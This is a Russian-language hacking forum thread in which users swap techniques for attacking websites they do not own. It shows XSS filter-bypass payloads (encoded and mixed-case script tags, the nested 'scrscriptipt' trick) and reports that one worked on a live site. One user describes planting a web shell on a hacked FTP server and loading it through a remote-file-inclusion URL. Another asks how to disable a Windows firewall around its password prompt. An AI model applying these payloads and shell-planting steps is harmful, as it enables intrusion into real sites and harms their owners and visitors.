можно попытыаться обойти фильтр зашифруй например s и j http://h4k.in/encoding/index.php

в смысле вот так?
<%73cript>alert("hello");</%73cript>
почемуто не работает(
просто как текст выводиться, броузер не воспринимает это как тэги

encode decimal entities в линк на кодировщик выше
так же там есть варианты обхода. пробуй.

так-с.. иногда прокатывает изменение регистра, типа <ScRipt> и JavaScript, а иногда, если, к примеру, вырезается слово "script" можно отправить "scrscriptipt", и после удаления слова "script" останется "script".

Наверно, как-нибудь ещё можно

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ

Если это паблик двиг,да и даже если не паблик,(те можно скачать), самое верное это посмотреть код, который отвечает за фильтрацию.

мухаха, изменение регистра помогло
двиг там походу самопальный, и он не вырезает, а заменяет на **caractères interdits**, это по-французски

Помогите разобраться с пхп инъекциями плз
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел
Подскажите пожалуйста решение)

скорее всего это просто iframe. никакой инъекции тут нет.

Народ, подскажите пожалуйста как отрубить microsoft firewall?
- после выполнения комманды net stop - винда уходит в ребут. При выполнении sc config просит пароль. Может есть кака-либо народная хитрость? )))